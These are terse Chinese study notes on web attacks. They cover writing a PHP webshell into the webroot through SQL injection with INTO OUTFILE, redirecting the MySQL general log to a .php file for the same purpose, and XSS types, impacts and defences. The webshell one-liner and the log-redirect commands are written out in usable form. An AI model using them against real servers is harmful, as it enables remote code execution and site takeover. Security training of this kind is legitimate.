课程内容
sql注入写webshell
写文件
SELECT '<!--?php @eval($_POST["cmd"]); ?-->' INTO OUTFILE '/var/www/html/shell.php';
利用条件
secure-file-priv为空或为能够访问到的目录
sql注入日志写webshell
开启mysql日志记录
set GLOBAL general_log = on;
修改mysql的基础日志文件保存位置/var/www/html/xxxx.php
set GLOBAL general_log_file = "/var/www/html/6666.php";
xss
分类
反射型
存储型
dom型
xxe
原因
后端未经严格验证导致用户可控的输入传给前端,造成输入被解析为js
危害
窃取用户敏感信息
劫持浏览器
记录用户输入
挖掘
白盒
黑盒
bp一顿扫
利用
反射型
通过短链接的方式让用户执行恶意script
存储型
等待被害者上钩
dom型
同反射型
常用payload

防御
上waf
前端过滤
后端过滤
绕过防御
















